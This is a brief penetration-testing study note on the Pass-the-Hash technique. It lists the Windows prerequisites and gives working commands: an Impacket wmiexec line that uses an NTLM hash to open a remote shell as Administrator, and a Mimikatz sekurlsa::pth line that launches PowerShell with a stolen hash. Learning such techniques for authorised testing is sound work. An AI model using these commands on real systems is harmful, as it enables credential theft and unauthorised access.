3. Pass-the-Hash

Theory:

• Requires:
  • User that authenticates often needs to be part of Administrator local group
  • SMB connection through firewall (commonly port 445)
  • Windows File and Printer Sharing enabled
  • ADMIN$ share available

Remote PtH Shell with Impacket:

In Kali:

/usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73

PtH with Mimikatz:

sekurlsa::pth /user:Administrator /domain:. /ntlm:… /run:”powershell”